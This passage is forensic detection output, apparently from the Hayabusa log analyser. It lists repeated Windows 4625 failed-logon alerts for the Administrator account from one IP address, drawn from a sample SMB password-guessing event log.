NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WxxawZZMhNCGHxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sKP8G2VgJlrr9LMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvOsNQpk3c5p1FgK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7oz7NPh5Z8UrDPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvzNFOLBlBv98Do4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KJmYytO30Icc6Rb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zro3jLjFXWZ2o8VL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Z2J8VYeuxd9fKcG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXMjOKLfMex7OmMv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgbm3YeoGxCa22Il : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7MEstBFjiWhVE18 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8Y2kDEiMZWf0znn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBAFVgPIOyCvtdRs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s3pFhUcspF6lzQXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39LFXXW715pQoADC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: in4ewyxouUnxQzCQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOtV8CLIU6Mcw2ty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8NJqimhGrg9uhTh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XEWLTOY9magV0h6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Di1MZsJx52Bi8E6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22MdB2QodynfibkF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qojej3YITXvXJ6Pe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CLjbQ6timbdQoufd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aZgoAnGEFwXN88bQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZFWoL9XUMJdfNnY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x000TRnXfVtPAQSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNHWWHDOpXQyNdrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1irbPdOoUfvq1MXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dCflbKOMPJRXQHsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zuy6nD4EXeGzEy5e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xkig4u0LIS9v3HMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94RbUrUcMf6VhP8A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X9f7wCJ3wI9RmZTL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkVs1viGo4RxhFaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKMLt6t01vUDDq1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYSif8ADOkC8aInB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EpmraSe2sxFVupTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VPtfy3AxXpt9D3bx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRMOrE0Ba983q0Jv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQ0nkyTAeJt3dCpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2fdsRMU9SMm1KpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3kliEPBsbsYNI7yG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gEKFGsRvvlzulxR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M6oUbT8LvS7JNCq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E4dxHwRQVR7iBWa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VRygirU257VfFcR5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6H6i0wkjvWkU6cmp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W4Nh7bYfVvx30hVF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQEsO4GpVjO5xpRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9ZlpSBwq0tLAgzm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65Piip53B1AiSBqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bh7SfuheoykW7Aym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tWdm76C4nL6tkU0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u2WEqTrg3A760Axt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyqhXspTlWwVCwA3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rkidbQJmvQr35Jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zr92VsL1YgHVehnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQP1K9rHrOyL0TOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LR783q3o34oLQLTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6NCTNhcghRGWf1qi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CVJdStLdKDbUICyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luAoVhEj1rOgZBfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OrqmovxoEEjLCaYV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AIP4mDSVhM27IAIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cym5lXDK01XuJz2b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7pYXA1Ic6BOfG31o : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b722QrTSVoZGfiK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NzRFz4L7dpar794B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pLWuw9eMN9rqm0Ic : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sE7pzfiKRfOb2dH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxL1cV8OiFVRfj4I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHs8Z8XPLg58jZ1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6kRLlJt3Oxwhdgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s4kTwriHAKVsTqzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jfitpZ5ZrzBfpNf6 : IP Address: 192.168.198.149 : AuthPackage: 